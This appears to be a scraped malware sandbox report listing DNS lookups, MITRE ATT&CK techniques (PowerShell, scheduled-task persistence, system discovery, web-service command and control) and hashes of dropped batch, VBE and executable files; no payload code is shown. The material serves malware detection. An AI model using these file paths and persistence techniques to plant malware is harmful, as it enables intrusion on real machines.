198.187.3.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

198.187.3.20.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

29.243.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

29.243.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

Filesize
1KB

MD5
baf55b95da4a601229647f25dad12878

SHA1
abc16954ebfd213733c4493fc1910164d825cac8

SHA256
ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

SHA512
24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Temp\4NR89d4K3E.bat

Filesize
236B

MD5
b25b42ce23e6d0e970d6a9f053c593f9

SHA1
0bffd2449eedc49a02066b9794819a689261bb33

SHA256
10ac90cf39acee3c1a8c8097b77baed6747ce5716be0b5ba53da9240183c99bb

SHA512
a1e1238b0a23c3ba0901209f45bf92bfd1e84e74bf9333bae28b56291206aa603be8fde56c564f80490871f0da779531b09747101a07150ba757d1592453fb77

Download Submit
C:\Users\Admin\AppData\Local\Temp\5EJ4eIa89C.bat

Filesize
236B

MD5
c0c1313eb04cee128c6d23e83fdd6ab1

SHA1
aa460c7aedcf171bf684702570af1668abfe0599

SHA256
013b3369144958a24e5dd2f9688932a7322386ece34420e8f1683e850f7b20bd

SHA512
bf397fdbbaede7fe00a072e7001f3875db0d0d4183cad8085eeb51f2f958d702cbdd6acfe64e42d725334625a8ee2d1eaf95e1cd021f2491ae4c9e68585d7d32

Download Submit
C:\Users\Admin\AppData\Local\Temp\8UyA8TRco5.bat

Filesize
236B

MD5
d5f877d9eadc69d45af5cc87fca0dc9a

SHA1
15f80f213f4df28cd0cd814e336584b57ff951d6

SHA256
b1c3da8b8a87bb0dd892bf4b85817e52255b0ef47a3e6ae3d18fc96e11da4ed1

SHA512
4efd259f72b2429da7fe973058e764dac4f3f6f3ac480ee59a7553d3d3a7a24a9d461fc7c07730be2cc3c63d80183915080d32d4993b7522a3549e74b74d8ad0

Download Submit
C:\Users\Admin\AppData\Local\Temp\CL2HVdYORd.bat

Filesize
236B

MD5
b694f766bd071d4b1c5e776e236dcabc

SHA1
f372088becfcfbb70621d2f88bfc78aac16a9aad

SHA256
0b5305f47852ca3cba77766e528e87ad2f94846c50dd9a6602401e7dbe3b39e4

SHA512
ad7add48670f4a018c64cf846edb365c05a7599d2a41380e8cc6d24e012ba70c71b680784885a705ff38fa2bc16039d05ff6f7c8732db62f9997d483d9f701f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RE4R3BzSze.bat

Filesize
236B

MD5
195e822c19dc2f0f2963ccc5fb7f52b2

SHA1
9b94bce9f5c7b9df761018c19e3729fcaa7adb9a

SHA256
8c93a6a1ed75eb92ffb222aee4fc5a9608f499bce8b57f4627eb414a37b085b2

SHA512
7990d63bd277607ddd055f822bdcb8b03cced62e2f399fab618012d99e26de5819c20d32bd8a7604d94b419b428f814b0b976a1c638822076c990b858fd94ff1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TA6UjH3MJQ.bat

Filesize
236B

MD5
d1d0d46841127fff917f9f17d2d02327

SHA1
11b7a612adeedc78644564312d4883c7208d9d79

SHA256
8cadee6e3c2210050603936c02c594acde25e9332d6bb64691229e76fdc9149e

SHA512
90a9a9855cca3bb4d22e33c82c6360d7840b67fed440907f5d70ee9978e05f5fa2ac103a16025f6c16c6866dda6be575946b7621af8f4eb293f22269073ae5ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\V68XQM6FdC.bat

Filesize
236B

MD5
c3d5e4b9a9f82f067480d9ec2f9d9ac0

SHA1
49ae78f84655e3e452cb6c477ba7b453d0061a1a

SHA256
95e24113b4331213d5e1fefccfb8bf3146f586ee40a212ead360ddbf71ca7b45

SHA512
a445f6a1fd6c709327101359ce23fe0583cfabb3541759b72a8400548fe7d58e487a953d82ab1675d5d152a7cae4ce145cc1d0c1d0381bacc46933014775f14a

Download Submit
C:\Users\Admin\AppData\Local\Temp\WqeaogqjWu.bat

Filesize
236B

MD5
54ce3e452e161dbcc55e7fb26e54231e

SHA1
4e77c4cce1a5e85ad394c514ddcffd01afd056bd

SHA256
32c17e541d77659022521fea07131e327eb9e80305d4346be9d159ed8c8ab4ae

SHA512
458b66bfb8eaf567707a0a283ee0290344e731a3203187437e450d0f2ce812834e4a703118178fe8054fbf634a371cedeba050e49234755d158a409e085c330a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sd0o0kmc.buq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dk6czFnjgV.bat

Filesize
236B

MD5
01e6c2765497f07210a2c542cc45df0c

SHA1
ef7897a10187d3ce48fdf6fd2116e3ab16be16dd

SHA256
1b11a09bca6175ed7b4bf68aad408fdeadc7405b00e4ee3574fbea343f665441

SHA512
4c6f520298646a149e42043c47350f2dbc5b505ebb0ca5b43e3a890a172e6cce302bccbefa077250d315eafe790abd016f35b4250d1ec6b6a05d348f77e236c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\kYBl3UyOdq.bat

Filesize
236B

MD5
e0ab13493e32ef70a9c00987bd8b285e

SHA1
43815c27b17042ec6a2aa5c95fb1f878de6b06ae

SHA256
e74d0cc8007809e702329bc2cc1c3931b8ab666a69450c7887f62c9d2cf18be5

SHA512
046b6cdb5c9f1fd2eb4702b87d284a7a780d95a0e6a662e5eb25df4e61744fe7ad4913e41cf4739ae09200c8616583facf07df241774c53530e01bf0d7a7cdc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ljgkLFIn4v.bat

Filesize
236B

MD5
8269cf1f030bd01cf9170be21e928ede

SHA1
8c215b2f1d676d08be5b3468e7c4001f834338f4

SHA256
8fccd3adc04ace57c4b55317f94bd19f784fc5546311b4c8e04ebde0d36ebf6f

SHA512
86bdbc19b5820f3d5072dc5fca1d5fe8318d333f1d5f6c7f385fa71e2b03ba408d336c5c7eab0420da2d08c38ea70d585d51dae3aa840462705e744258125b6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\pksuDlslcW.bat

Filesize
236B

MD5
a69bb939dc0007eed263728b5afedf1f

SHA1
d3b645c21509d00dac1e6275107d27d3bd49440e

SHA256
2df5f11d1a8bacab8ee2cc027c9629782f36e7430720fc011cb53092abe5b958

SHA512
7808be3dacfc1b23f446704519e2bd8116a76e89d9f41a10c4f1475fed0ecc9f90922024ac037e3732edc99c654cb21bd0be04c1d141fc8e6d442be102d47485

Download Submit
C:\Users\Admin\AppData\Local\Temp\uSow6ZWML2.bat

Filesize
236B

MD5
edc34e03724e4739baa6d56f1c211f13

SHA1
a565138f01ef75e38894de67d797c1d255f98337

SHA256
839971f35fc9371356bf18913afa7ce3982686ecb2247b1aa80a95ed53c68156

SHA512
2930f38ab46152180b6369e009b0fea7a26c2217a4e8cff99b5f44b7b8dd8f177db10e7d4f136ced578e23b35cc876f90b5a424e9147dc6c260b14f28dfa9fc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\xZLz5Ote6t.bat

Filesize
236B

MD5
a03e0a98397877103988ae5713db1031

SHA1
81b6441e81cdfabcdfb19fd1c1ac8e01b7003d71

SHA256
38b9d9b2239f944839a13b97be375d3acb724f20e48f5a9230f6953029be4b3b

SHA512
0d52ec1c1d58db9bb9ecfcbd045b6ff7919b67cb2fcb8bc793a2e4c82ad1edd86eda509e9f5ceeec3c7f4c5b7d0593d51c0b4c9042a00bbdeeb72c5fc25551a2

Download Submit
C:\providercommon\1zu9dW.bat

Filesize
36B

MD5
6783c3ee07c7d151ceac57f1f9c8bed7

SHA1
17468f98f95bf504cc1f83c49e49a78526b3ea03

SHA256
8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

SHA512
c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

Download Submit
C:\providercommon\DllCommonsvc.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

Filesize
197B

MD5
8088241160261560a02c84025d107592

SHA1
083121f7027557570994c9fc211df61730455bb5

SHA256
2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

SHA512
20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

Download Submit
memory/60-159-0x00000000012F0000-0x0000000001302000-memory.dmp

Filesize
72KB

Download
memory/368-17-0x000000001AC80000-0x000000001AC8C000-memory.dmp

Filesize
48KB

Download
memory/368-16-0x000000001AC60000-0x000000001AC6C000-memory.dmp

Filesize
48KB

Download
memory/368-15-0x000000001AC70000-0x000000001AC7C000-memory.dmp

Filesize
48KB

Download
memory/368-14-0x0000000002270000-0x0000000002282000-memory.dmp

Filesize
72KB

Download
memory/368-13-0x0000000000050000-0x0000000000160000-memory.dmp

Filesize
1.1MB

Download
memory/368-12-0x00007FFA102C3000-0x00007FFA102C5000-memory.dmp

Filesize
8KB

Download
memory/1572-152-0x00000000028C0000-0x00000000028D2000-memory.dmp

Filesize
72KB

Download
memory/2288-72-0x0000000002120000-0x0000000002132000-memory.dmp

Filesize
72KB

Download
memory/2728-96-0x0000000003140000-0x0000000003152000-memory.dmp

Filesize
72KB

Download
memory/2984-121-0x0000000003250000-0x0000000003262000-memory.dmp

Filesize
72KB

Download
memory/4768-44-0x00000279E1D10000-0x00000279E1D32000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.